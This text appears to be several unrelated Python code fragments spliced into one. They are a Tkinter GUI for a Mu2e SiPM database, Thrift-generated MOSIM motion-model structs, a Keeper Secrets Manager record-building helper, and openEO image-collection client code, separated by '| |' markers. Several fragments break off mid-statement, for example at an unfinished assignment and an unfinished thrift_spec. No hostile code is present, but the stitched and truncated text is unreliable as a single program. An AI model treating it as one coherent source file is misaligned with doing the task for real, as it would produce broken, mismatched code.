self.__mySaveIt.setOutputFileName('sipmQuerries')
self.__mySaveIt.openFile()
self.__row = 0
self.__col = 0
self.__strName = []
self.__sCount = 0
##
##
##
## First Column...
self.__col = 0
self.__firstRow = 0
##
## Instruction Box...
self.__myInstructions = myScrolledText(self)
self.__myInstructions.setTextBoxWidth(50)
self.__myInstructions.makeWidgets()
self.__myInstructions.setText('','Instructions/InstructionsForSipmRootQuerry2017Jun28.txt')
self.__myInstructions.grid(row=self.__firstRow,column=self.__col,columnspan=2)
self.__firstRow += 1
##
self.__strName.append("Sipm PO")
self.__labelWidth = 15
self.__SipmBatchStr = myStringEntry(self,self.__firstRow,self.__col,self.__mySaveIt)
self.__SipmBatchStr.setEntryText(self.__strName[self.__sCount])
self.__SipmBatchStr.setLabelWidth(self.__labelWidth)
self.__SipmBatchStr.setEntryWidth(self.__entryWidth)
self.__SipmBatchStr.setButtonWidth(self.__buttonWidth)
self.__SipmBatchStr.makeEntry()
self.__SipmBatchStr.grid(row=self.__firstRow,column=self.__col,stick=W,columnspan=2)
self.__firstRow += 1
## Add list box to first columnspan
## This sequence presents a list box filled with the
## available batches. A left double click appends a
## another comma separated batch...
## Click the "Batches button" to load the list of batches
self.__tempBatchResults = []
self.__tempBatchResults = self.getSipmsBatchesFromDatabase()
if(self.__cmjPlotDiag != 0) : print(("self.__tempBatchResults = %s \n") % (self.__tempBatchResults))
self.__myOptions = []
for self.__m in self.__tempBatchResults:
self.__temp = self.__m.rsplit(",",8)
self.__myOptions.append(self.__temp[0])
self.__myScrolledList = ScrolledList(self,self.__myOptions)
self.__myScrolledList.grid(row=self.__firstRow,column=self.__col,sticky=W,rowspan=4)
## New Row
## Add button to get available batches...
## Enter the request for batches to be histogrammed.
## A single batch or a string of comma separated multiple batches
## may be selected for histogramming.
self.__col = 1
self.__secondRow = 2
self.__buttonWidth = 10
self.__getValues = Button(self,text='Batches',command=self.loadSipmBatchRequest,width=self.__buttonWidth,bg='lightblue',fg='black')
self.__getValues.grid(row=self.__secondRow,column=self.__col,sticky=W)
self.__secondRow += 1
## Plot scatter plots
self.__getValues = Button(self,text='Scatter Plots',command=self.getScatterPlots,width=self.__buttonWidth,bg='green',fg='black')
self.__getValues.grid(row=self.__secondRow,column=self.__col,sticky=W)
self.__secondRow += 1
## Plot histograms
self.__getValues = Button(self,text='Histograms',command=self.getHistograms,width=self.__buttonWidth,bg='green',fg='black')
self.__getValues.grid(row=self.__secondRow,column=self.__col,sticky=W)
self.__secondRow += 1
## Third Column...
self.__row = 0
self.__col = 2
self.__logo = mu2eLogo(self,self.__row,self.__col) # display Mu2e logo!
self.__logo.grid(row=self.__row,column=self.__col,rowspan=2,sticky=NE)
# Display the script's version number
self.__version = myLabel(self,self.__row,self.__col)
self.__version.setForgroundColor('blue')
self.__version.setFontAll('Arial',10,'bold')
self.__version.setWidth(20)
self.__version.setText(Version)
self.__version.makeLabel()
self.__version.grid(row=self.__row,column=self.__col,stick=E)
self.__row += 1
# Display the date the script is being run
self.__date = myDate(self,self.__row,self.__col,10) # make entry to row... pack right
self.__date.grid(row=self.__row,column=self.__col,sticky=E)
self.__col = 0
self.__row = 8
# Display the debug level selection
self.__col = 0
self.__buttonName = 'Debug Level (0 to 5)'
self.StringEntrySetup(self.__row,self.__col,self.__labelWidth,self.__entryWidth,self.__buttonWidth,self.__buttonName,self.__buttonName)
self.__row += 1
self.__buttonWidth = 10
##
## Add progress bar
#self.__progressbarStyle = Style()
#self.__progressbarStyle.configure("red.Horizontal.TProgressBar",background="red",forground="black")
#self.__progressbar = Progressbar(self.__frame0,orient=HORIZONTAL,length=200,maximum=300,variable=self.__progressBarCount,mode='determinate')
self.__row = 11
tempSipmRows = 10*self.countTheSimps()
self.__progressbarStyle = Style()
self.__progressbarStyle.theme_use('clam')
#self.__progressbarStyle.configure("green.Horizontal.TProgressbar",background="green")
#self.__progressbar = Progressbar(self,style="green.Horizontal.TProgressBar",orient=HORIZONTAL,length=500,maximum=tempSipmRows,variable=self.__progressBarCount,mode='determinate')
self.__progressBarMaximum = tempSipmRows
self.__progressbar = Progressbar(self,orient=HORIZONTAL,length=500,maximum=self.__progressBarMaximum,variable=self.__progressBarCount,mode='determinate')
self.__progressbar.grid(row=self.__row,column=0,columnspan=10,sticky=W)
## Add Control Bar at the bottom...
self.__col = 0
self.__firstRow = 10
self.__quitNow = Quitter(self,0,self.__col)
self.__quitNow.grid(row=self.__firstRow,column=0,sticky=W)
##
## -------------------------------------------------------------------
## Make querries to data base
def setupDevelopmentDatabase(self):
self.__database = 'mu2e_hardware_dev'
self.__group = "Sipm Tables"
self.__whichDatabase = 'development'
print("...multiWindow::getFromDevelopmentDatabase... get from development database \n")
self.__queryUrl = self.__database_config.getQueryUrl()
##
## -------------------------------------------------------------------
## Make querries to data base
def setupProductionDatabase(self):
self.__database = 'mu2e_hardware_prd'
self.__group = "Sipm Tables"
self.__whichDatabase = 'production'
print("...multiWindow::getFromProductionDatabase... get from production database \n")
self.__url = self.__database_config.getProductionQueryUrl()
##
#####################################################################################
##
## Setup local control: set debug level
##
##
## ===================================================================
## Local String Entry button
## Need to setup here to retain local program flow
def StringEntrySetup(self,row,col,totWidth=20,labelWidth=10,entryWidth=10,entryText='',buttonName='default',buttonText='Enter'):
print("----- StringEntrySetup--- Enter")
self.__StringEntry_row = row
self.__StringEntry_col = col
self.__StringEntry_labelWidth = 10
self.__StringEntry_entryWidth = 10
self.__StringEntry_buttonWidth= | |
TType.LIST, 12)
oprot.writeListBegin(TType.STRUCT, len(self.Dependencies))
for iter112 in self.Dependencies:
iter112.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.Events is not None:
oprot.writeFieldBegin('Events', TType.LIST, 13)
oprot.writeListBegin(TType.STRING, len(self.Events))
for iter113 in self.Events:
oprot.writeString(iter113.encode('utf-8') if sys.version_info[0] == 2 else iter113)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.LongDescription is not None:
oprot.writeFieldBegin('LongDescription', TType.STRING, 14)
oprot.writeString(self.LongDescription.encode('utf-8') if sys.version_info[0] == 2 else self.LongDescription)
oprot.writeFieldEnd()
if self.ShortDescription is not None:
oprot.writeFieldBegin('ShortDescription', TType.STRING, 15)
oprot.writeString(self.ShortDescription.encode('utf-8') if sys.version_info[0] == 2 else self.ShortDescription)
oprot.writeFieldEnd()
if self.Parameters is not None:
oprot.writeFieldBegin('Parameters', TType.LIST, 16)
oprot.writeListBegin(TType.STRUCT, len(self.Parameters))
for iter114 in self.Parameters:
iter114.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.SceneParameters is not None:
oprot.writeFieldBegin('SceneParameters', TType.LIST, 17)
oprot.writeListBegin(TType.STRUCT, len(self.SceneParameters))
for iter115 in self.SceneParameters:
iter115.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.Vendor is not None:
oprot.writeFieldBegin('Vendor', TType.STRING, 18)
oprot.writeString(self.Vendor.encode('utf-8') if sys.version_info[0] == 2 else self.Vendor)
oprot.writeFieldEnd()
if self.VendorDomain is not None:
oprot.writeFieldBegin('VendorDomain', TType.STRING, 19)
oprot.writeString(self.VendorDomain.encode('utf-8') if sys.version_info[0] == 2 else self.VendorDomain)
oprot.writeFieldEnd()
if self.MmuUrl is not None:
oprot.writeFieldBegin('MmuUrl', TType.STRING, 20)
oprot.writeString(self.MmuUrl.encode('utf-8') if sys.version_info[0] == 2 else self.MmuUrl)
oprot.writeFieldEnd()
if self.UpdateUrl is not None:
oprot.writeFieldBegin('UpdateUrl', TType.STRING, 21)
oprot.writeString(self.UpdateUrl.encode('utf-8') if sys.version_info[0] == 2 else self.UpdateUrl)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.Name is None:
raise TProtocolException(message='Required field Name is unset!')
if self.ID is None:
raise TProtocolException(message='Required field ID is unset!')
if self.AssemblyName is None:
raise TProtocolException(message='Required field AssemblyName is unset!')
if self.MotionType is None:
raise TProtocolException(message='Required field MotionType is unset!')
if self.Language is None:
raise TProtocolException(message='Required field Language is unset!')
if self.Author is None:
raise TProtocolException(message='Required field Author is unset!')
if self.Version is None:
raise TProtocolException(message='Required field Version is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class MInstruction(object):
"""
Attributes:
- ID
- Name
- MotionType
- Properties
- Constraints
- StartCondition
- EndCondition
- Action
- Instructions
"""
def __init__(self, ID=None, Name=None, MotionType=None, Properties=None, Constraints=None, StartCondition=None, EndCondition=None, Action=None, Instructions=None,):
self.ID = ID
self.Name = Name
self.MotionType = MotionType
self.Properties = Properties
self.Constraints = Constraints
self.StartCondition = StartCondition
self.EndCondition = EndCondition
self.Action = Action
self.Instructions = Instructions
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ID = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.Name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.MotionType = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.Properties = {}
(_ktype117, _vtype118, _size116) = iprot.readMapBegin()
for _i120 in range(_size116):
_key121 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val122 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.Properties[_key121] = _val122
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.LIST:
self.Constraints = []
(_etype126, _size123) = iprot.readListBegin()
for _i127 in range(_size123):
_elem128 = MOSIM.mmi.constraints.ttypes.MConstraint()
_elem128.read(iprot)
self.Constraints.append(_elem128)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.StartCondition = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.EndCondition = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.STRING:
self.Action = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.LIST:
self.Instructions = []
(_etype132, _size129) = iprot.readListBegin()
for _i133 in range(_size129):
_elem134 = MInstruction()
_elem134.read(iprot)
self.Instructions.append(_elem134)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('MInstruction')
if self.ID is not None:
oprot.writeFieldBegin('ID', TType.STRING, 1)
oprot.writeString(self.ID.encode('utf-8') if sys.version_info[0] == 2 else self.ID)
oprot.writeFieldEnd()
if self.Name is not None:
oprot.writeFieldBegin('Name', TType.STRING, 2)
oprot.writeString(self.Name.encode('utf-8') if sys.version_info[0] == 2 else self.Name)
oprot.writeFieldEnd()
if self.MotionType is not None:
oprot.writeFieldBegin('MotionType', TType.STRING, 3)
oprot.writeString(self.MotionType.encode('utf-8') if sys.version_info[0] == 2 else self.MotionType)
oprot.writeFieldEnd()
if self.Properties is not None:
oprot.writeFieldBegin('Properties', TType.MAP, 4)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.Properties))
for kiter135, viter136 in self.Properties.items():
oprot.writeString(kiter135.encode('utf-8') if sys.version_info[0] == 2 else kiter135)
oprot.writeString(viter136.encode('utf-8') if sys.version_info[0] == 2 else viter136)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.Constraints is not None:
oprot.writeFieldBegin('Constraints', TType.LIST, 5)
oprot.writeListBegin(TType.STRUCT, len(self.Constraints))
for iter137 in self.Constraints:
iter137.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.StartCondition is not None:
oprot.writeFieldBegin('StartCondition', TType.STRING, 6)
oprot.writeString(self.StartCondition.encode('utf-8') if sys.version_info[0] == 2 else self.StartCondition)
oprot.writeFieldEnd()
if self.EndCondition is not None:
oprot.writeFieldBegin('EndCondition', TType.STRING, 7)
oprot.writeString(self.EndCondition.encode('utf-8') if sys.version_info[0] == 2 else self.EndCondition)
oprot.writeFieldEnd()
if self.Action is not None:
oprot.writeFieldBegin('Action', TType.STRING, 8)
oprot.writeString(self.Action.encode('utf-8') if sys.version_info[0] == 2 else self.Action)
oprot.writeFieldEnd()
if self.Instructions is not None:
oprot.writeFieldBegin('Instructions', TType.LIST, 9)
oprot.writeListBegin(TType.STRUCT, len(self.Instructions))
for iter138 in self.Instructions:
iter138.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.ID is None:
raise TProtocolException(message='Required field ID is unset!')
if self.Name is None:
raise TProtocolException(message='Required field Name is unset!')
if self.MotionType is None:
raise TProtocolException(message='Required field MotionType is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(MSimulationState)
MSimulationState.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'Initial', [MOSIM.mmi.avatar.ttypes.MAvatarPostureValues, None], None, ), # 1
(2, TType.STRUCT, 'Current', [MOSIM.mmi.avatar.ttypes.MAvatarPostureValues, None], None, ), # 2
(3, TType.LIST, 'Constraints', (TType.STRUCT, [MOSIM.mmi.constraints.ttypes.MConstraint, None], False), None, ), # 3
(4, TType.LIST, 'SceneManipulations', (TType.STRUCT, [MOSIM.mmi.scene.ttypes.MSceneManipulation, None], False), None, ), # 4
(5, TType.LIST, 'Events', (TType.STRUCT, [MSimulationEvent, None], False), None, ), # 5
)
all_structs.append(MSimulationResult)
MSimulationResult.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'Posture', [MOSIM.mmi.avatar.ttypes.MAvatarPostureValues, None], None, ), # 1
(2, TType.LIST, 'Constraints', (TType.STRUCT, [MOSIM.mmi.constraints.ttypes.MConstraint, None], False), None, ), # 2
(3, TType.LIST, 'Events', (TType.STRUCT, [MSimulationEvent, None], False), None, ), # 3
(4, TType.LIST, 'SceneManipulations', (TType.STRUCT, [MOSIM.mmi.scene.ttypes.MSceneManipulation, None], False), None, ), # 4
(5, TType.LIST, 'DrawingCalls', (TType.STRUCT, [MOSIM.mmi.scene.ttypes.MDrawingCall, None], False), None, ), # 5
(6, TType.LIST, 'LogData', (TType.STRING, 'UTF8', False), None, ), # 6
)
all_structs.append(MSimulationEvent)
MSimulationEvent.thrift_spec = (
None, # 0
(1, TType.STRING, 'Name', 'UTF8', None, ), # 1
(2, TType.STRING, 'Type', 'UTF8', None, ), # 2
(3, TType.STRING, 'Reference', 'UTF8', None, ), # 3
(4, TType.MAP, 'Properties', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 4
)
all_structs.append(MVersion)
MVersion.thrift_spec = (
None, # 0
(1, TType.I16, 'Major', None, None, ), # 1
(2, TType.I16, 'Minor', None, None, ), # 2
(3, TType.I16, 'Sub', None, None, ), # 3
(4, TType.I16, 'Subsub', None, None, ), # 4
)
all_structs.append(MDependency)
MDependency.thrift_spec = (
None, # 0
(1, TType.STRING, 'ID', 'UTF8', None, ), # 1
(2, TType.I32, 'Type', None, None, ), # 2
(3, TType.STRUCT, 'MinVersion', [MVersion, None], None, ), # 3
(4, TType.STRUCT, 'MaxVersion', [MVersion, None], None, ), # 4
(5, TType.LIST, 'ExcludedVersions', (TType.STRUCT, [MVersion, None], False), None, ), # 5
(6, TType.STRING, 'Name', 'UTF8', None, ), # 6
)
all_structs.append(MMUDescription)
MMUDescription.thrift_spec = (
None, # 0
(1, TType.STRING, 'Name', 'UTF8', None, ), # 1
(2, TType.STRING, 'ID', 'UTF8', None, ), # 2
(3, TType.STRING, 'AssemblyName', 'UTF8', None, ), # 3
(4, TType.STRING, 'MotionType', 'UTF8', None, ), # 4
None, # 5
(6, TType.STRING, 'Language', 'UTF8', None, ), # 6
(7, TType.STRING, 'Author', 'UTF8', None, ), # 7
(8, TType.STRING, 'Version', 'UTF8', None, ), # 8
(9, TType.LIST, 'Prerequisites', (TType.STRUCT, [MOSIM.mmi.constraints.ttypes.MConstraint, None], False), None, ), # 9
None, # 10
(11, TType.MAP, 'Properties', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 11
(12, TType.LIST, 'Dependencies', (TType.STRUCT, [MDependency, None], False), None, ), # 12
(13, TType.LIST, 'Events', (TType.STRING, 'UTF8', False), None, ), # 13
(14, TType.STRING, 'LongDescription', 'UTF8', None, ), # 14
(15, TType.STRING, 'ShortDescription', 'UTF8', None, ), # 15
(16, TType.LIST, 'Parameters', (TType.STRUCT, [MOSIM.mmi.core.ttypes.MParameter, None], False), None, ), # 16
(17, TType.LIST, 'SceneParameters', (TType.STRUCT, [MOSIM.mmi.core.ttypes.MParameter, None], False), None, ), # 17
(18, TType.STRING, 'Vendor', 'UTF8', None, ), # 18
(19, TType.STRING, 'VendorDomain', 'UTF8', None, ), # 19
(20, TType.STRING, 'MmuUrl', 'UTF8', None, ), # 20
(21, TType.STRING, 'UpdateUrl', 'UTF8', None, ), # 21
)
all_structs.append(MInstruction)
MInstruction.thrift_spec = | |
from keeper_secrets_manager_helper.field import Field, FieldSectionEnum
from keeper_secrets_manager_helper.common import load_file
from keeper_secrets_manager_helper.v3.record_type import get_class_by_type as get_record_type_class
from keeper_secrets_manager_helper.v3.field_type import get_class_by_type as get_field_type_class
from importlib import import_module
class Record:
@staticmethod
def create_from_file(file, password_generate=False):
record_data = load_file(file)
return Record.create_from_data(record_data, password_generate=password_generate)
@staticmethod
def create_from_data(record_data, password_generate=False):
records = []
if record_data.get("version") != "v3":
raise ValueError(".version is not 'v3'")
if record_data.get("kind") != "KeeperRecord":
raise ValueError(".kind is not 'KeeperRecord'")
data = record_data.get("data")
if data is None:
raise ValueError(".data[] is missing")
if isinstance(data, list) is False:
raise ValueError(".data[] is not an array")
record_count = 0
for record_item in data:
record_type = record_item.get("recordType", record_item.get("record_type"))
if record_type is None or record_type == "":
raise ValueError(f".data[{record_count}].recordType is missing or blank")
title = record_item.get("title")
if title is None or title == "":
raise ValueError(f".data[{record_count}].title is missing or blank")
record = Record(
record_type=record_type,
title=title,
notes=record_item.get("notes"),
password_generate=password_generate
)
all_fields = []
fields = record_item.get("fields")
if fields is None:
raise ValueError(f".data[{record_count}].fields[] is missing")
if isinstance(fields, list) is False:
raise ValueError(f".data[{record_count}].fields[] is not an array")
for field_item in fields:
field = Field(
type=field_item.get("type"),
field_section=FieldSectionEnum.STANDARD,
label=field_item.get("label"),
value=field_item.get("value"),
)
all_fields.append(field)
custom_fields = record_item.get("customFields", record_item.get("custom_fields"))
if custom_fields is not None:
if isinstance(custom_fields, list) is False:
raise ValueError(f".data[{record_count}].fields[] is not an array")
for field_item in custom_fields:
field = Field(
type=field_item.get("type"),
field_section=FieldSectionEnum.CUSTOM,
label=field_item.get("label"),
value=field_item.get("value"),
)
all_fields.append(field)
record.add_fields(all_fields)
record.build_record()
records.append(record)
return records
def __init__(self, *args, **kwargs):
# If there is an arg, then assume it's a dictionary with record data.
if len(args) > 0:
pass
self.record_type = kwargs.get("record_type")
self.title = kwargs.get("title")
self.notes = kwargs.get("notes")
self.fields = []
self.custom_fields = []
if self.record_type is None or self.record_type == "":
raise ValueError("record_type is missing or blank.")
try:
record_type = get_record_type_class(self.record_type)()
# Make a quick lookup for the standard fields.
self._valid_fields = [{"type": x.get("type"), "label": x.get("label"), "has_value": False}
for x in record_type.get_standard_fields()]
except ImportError as err:
raise ValueError(err)
if self.title is None or self.title == "":
raise ValueError("title is missing or blank.")
# The fields are mapped here in an attempt to make unique fields.
self._fields = {
FieldSectionEnum.STANDARD: {},
FieldSectionEnum.CUSTOM: {}
}
self.password_generate = kwargs.get("password_generate", False)
self.password_complexity = kwargs.get("password_complexity", None)
self.valid_fields = []
# All the fields (standard/custom) to be passed in with the constructor.
fields = kwargs.get("fields")
if fields is not None:
self.add_fields(fields)
self.build_record()
def _add_new_field(self, field, field_key, group_key):
# Count the number of keys in the dictionary and use that for an index. That will be used determine
# the order.
field.index = len(self._fields[field.field_section])
# If the group key is not None, then convert the value to an array.
if group_key is not None and isinstance(field.value, list) is False:
field.value = [field.value]
self._fields[field.field_section][field_key] = field
def _is_valid_standard_field(self, field_type):
for item in self._valid_fields:
if item.get("type") == field_type and item.get("has_value") is False:
return True
return False
def _flag_standard_field_used(self, field_type):
for item in self._valid_fields:
if item.get("type") == field_type and item.get("has_value") is False:
item["has_value"] = True
break
def _get_label_for_standard_field(self, field_type):
for item in self._valid_fields:
if item.get("type") == field_type and item.get("has_value") is False:
return item.get("label")
return None
def add_fields(self, fields):
if isinstance(fields, list) is False:
fields = [fields]
for field in fields:
if isinstance(field, Field) is False:
raise ValueError("The method add_field requires instance(s) of Field")
#
label = None
if field.field_section == FieldSectionEnum.STANDARD:
label = self._get_label_for_standard_field(field.type)
field_key = field.instance_field_key(label=label)
group_key = field.group_key
# Does this key already exists? And can we add values to the dictionary value?
if field_key in self._fields[field.field_section] and field.can_add_key_value():
# If out value is a string we should not be in here.
if isinstance(field.value, str) is True:
raise ValueError(f"The {field.type} is a string. If JSON check to see if JSON is valid.")
# Get the existing field and copy any values in it's dictionary into the existing.
existing_field = self._fields[field.field_section][field_key]
# If the field is completely set
if existing_field.is_complete is True and existing_field.field_section == FieldSectionEnum.STANDARD:
raise ValueError("Attempting to set a standard field that has already been set.")
# The existing field is complete and a custom field, so add
if existing_field.is_complete is True:
raise ValueError("Cannot add this field due to it not being unique. To make unique add a label to "
"the field or make sure the label is not being duplicated.")
# If the existing_field is JSON and the current field is JSON, then add to existing. This allows
# the value to be set with multiple objects.
if existing_field.initial_value_was_json and field.initial_value_was_json:
if isinstance(existing_field.value, dict) is True:
existing_field.value = [existing_field.value]
if isinstance(field.value, list) is True:
for item in field.value:
existing_field.value.append(item)
else:
existing_field.value.append(field.value)
continue
for k, v in field.value.items():
# If tke group key is set. The value can be multiple dictionaries that have a specific key
# which indicates its uniqueness. If that key does not exist, values can be inserted into the
# last dictionary in the list. If does exists, then a new dictionary is created.
if group_key is not None:
found_a_place = False
for item in existing_field.value:
if group_key not in item and item.get(Field.complete_key) is not True:
item[k] = v
found_a_place = True
else:
item[Field.complete_key] = True
if found_a_place is False and isinstance(existing_field.value, list) is True:
new_object = {k: v}
existing_field.value.append(new_object)
elif isinstance(existing_field.value, dict) is True:
existing_field.value[k] = v
# Else we are creating a new entry.
else:
# Standard fields are defined. Don't insert a field that doesn't belong.
if field.field_section == FieldSectionEnum.STANDARD:
if self._is_valid_standard_field(field.type):
self._flag_standard_field_used(field.type)
else:
raise ValueError(f"The standard fields do not have a '{field.type}' "
"field type or they all have values.")
self._add_new_field(field, field_key, group_key)
@staticmethod
def _copy_record_type_settings(field_obj, standard_field):
# Copy extra values from the record type schema to the field. These are unique field type params like
# required, enforce_generation and complexity.
for key, value in standard_field.items():
field_obj.add_extra(key, value)
def _get_standard_fields(self, record_type):
# Add the standard fields in the order defined by record type schema.
fields_list = []
# Get a list of standard fields in the Record Type.
for standard_field in record_type.get_standard_fields():
# First check if we have a key with a label, if it exists, and then use that.
field_key = Field.field_key(standard_field.get("type"), standard_field.get("label"))
if field_key in self._fields[FieldSectionEnum.STANDARD]:
field_obj = self._fields[FieldSectionEnum.STANDARD][field_key]
self._copy_record_type_settings(field_obj, standard_field)
fields_list.append(field_obj)
else:
# Find the field by it's field type.
field_key = Field.field_key(standard_field.get("type"), None)
if field_key in self._fields[FieldSectionEnum.STANDARD]:
field_obj = self._fields[FieldSectionEnum.STANDARD][field_key]
self._copy_record_type_settings(field_obj, standard_field)
fields_list.append(field_obj)
else:
# If nothing exists, make an empty field for the field type
field_obj = Field(
type=standard_field.get("type"),
field_section=FieldSectionEnum.STANDARD,
value=None
)
self._copy_record_type_settings(field_obj, standard_field)
fields_list.append(field_obj)
return fields_list
def _get_custom_fields(self):
def get_index_key(obj):
return obj.index
# Add the custom fields in the order they were added.
fields_list = [self._fields[FieldSectionEnum.CUSTOM][x] for x in self._fields[FieldSectionEnum.CUSTOM]]
fields_list.sort(key=get_index_key)
return fields_list
@staticmethod
def _remove_private_keys(obj):
"""
The value might contain dictionaries what contain private key. This will remove any that exists. Right
now it's just one.
"""
if isinstance(obj, list):
for item in obj:
Record._remove_private_keys(item)
elif isinstance(obj, dict):
obj.pop(Field.complete_key, None)
def build_record(self):
record_type = get_record_type_class(self.record_type)()
# Take all the standard fields from the user's input and populate the field type to validate it. Then
# the dictionary used in the V3 records for a field to the list.
self.fields = []
for field in self._get_standard_fields(record_type):
field_type_kwargs = field.to_dict()
self._remove_private_keys(field_type_kwargs.get("value"))
field_type_kwargs["password_generate"] = self.password_generate
if self.password_complexity is not None:
field_type_kwargs["complexity"] = self.password_complexity
field_type_obj = get_field_type_class(field.type)(**field_type_kwargs)
self.fields.append(field_type_obj.to_dict())
# Do the same with the custom fields.
self.custom_fields = []
for field in self._get_custom_fields():
field_type_kwargs = field.to_dict()
self._remove_private_keys(field_type_kwargs.get("value"))
field_type_kwargs["password_generate"] = self.password_generate
if self.password_complexity is not None:
field_type_kwargs["complexity"] = self.password_complexity
field_type_obj = get_field_type_class(field.type)(**field_type_kwargs)
self.custom_fields.append(field_type_obj.to_dict())
def get_record_create_obj(self):
try:
# Make sure the classes we need are in the KSM Python SDK.
mod = import_module("keeper_secrets_manager_core.dto.dtos")
if hasattr(mod, "RecordCreate") is False:
raise ImportError("Cannot find the RecordCreate in the KSM Python SDK. Please update the SDK.")
record_field_class = getattr(mod, "RecordField")
if record_field_class is None:
raise ImportError("Cannot find the RecordField in the KSM Python SDK. Please update the SDK.")
# Make an instance of the SDK's RecordCreate
new_record = getattr(mod, "RecordCreate")(
record_type=self.record_type,
title=self.title
)
# Add the standard fields thru RecordField constructor
record_field = []
for field in self.fields:
# Translate dictionary | |
import copy
import datetime
import logging
import pathlib
import typing
from typing import List, Dict, Union, Tuple
from shapely.geometry import Polygon, MultiPolygon, mapping
from openeo.imagecollection import ImageCollection
from openeo.internal.graphbuilder_040 import GraphBuilder
from openeo.metadata import CollectionMetadata
from openeo.rest import BandMathException
from openeo.rest.job import RESTJob
from openeo.rest.service import Service
from openeo.util import get_temporal_extent, legacy_alias, dict_no_none, guess_format
if hasattr(typing, 'TYPE_CHECKING') and typing.TYPE_CHECKING:
# Imports for type checking only (circular import issue at runtime). `hasattr` is Python 3.5 workaround #210
from openeo.rest.connection import Connection
_log = logging.getLogger(__name__)
class ImageCollectionClient(ImageCollection):
"""Class representing an Image Collection. (In the API as 'imagery')
Supports 0.4.
"""
def __init__(self, node_id: str, builder: GraphBuilder, session: 'Connection', metadata: CollectionMetadata = None):
self.node_id = node_id
self.builder= builder
self.session = session
self.graph = builder.processes
self.metadata = CollectionMetadata.get_or_create(metadata)
def __str__(self):
return "ImageCollection: %s" % self.node_id
@property
def _api_version(self):
return self.session.capabilities().api_version_check
@property
def connection(self):
return self.session
@classmethod
def load_collection(
cls, collection_id: str, session: 'Connection' = None,
spatial_extent: Union[Dict[str, float], None] = None,
temporal_extent: Union[List[Union[str,datetime.datetime,datetime.date]], None] = None,
bands: Union[List[str], None] = None,
fetch_metadata=True
):
"""
Create a new Image Collection/Raster Data cube.
:param collection_id: A collection id, should exist in the backend.
:param session: The session to use to connect with the backend.
:param spatial_extent: limit data to specified bounding box or polygons
:param temporal_extent: limit data to specified temporal interval
:param bands: only add the specified bands
:return:
"""
# TODO: rename function to load_collection for better similarity with corresponding process id?
builder = GraphBuilder()
process_id = 'load_collection'
normalized_temporal_extent = list(get_temporal_extent(extent=temporal_extent)) if temporal_extent is not None else None
arguments = {
'id': collection_id,
'spatial_extent': spatial_extent,
'temporal_extent': normalized_temporal_extent,
}
metadata = session.collection_metadata(collection_id) if fetch_metadata else None
if bands:
if isinstance(bands, str):
bands = [bands]
if metadata:
bands = [metadata.band_dimension.band_name(b, allow_common=False) for b in bands]
arguments['bands'] = bands
node_id = builder.process(process_id, arguments)
if bands:
metadata = metadata.filter_bands(bands)
return cls(node_id, builder, session, metadata=metadata)
create_collection = legacy_alias(load_collection, "create_collection")
@classmethod
def load_disk_collection(cls, session: 'Connection', file_format: str, glob_pattern: str, **options) -> 'ImageCollection':
"""
Loads image data from disk as an ImageCollection.
:param session: The session to use to connect with the backend.
:param file_format: the file format, e.g. 'GTiff'
:param glob_pattern: a glob pattern that matches the files to load from disk
:param options: options specific to the file format
:return: the data as an ImageCollection
"""
builder = GraphBuilder()
process_id = 'load_disk_data'
arguments = {
'format': file_format,
'glob_pattern': glob_pattern,
'options': options
}
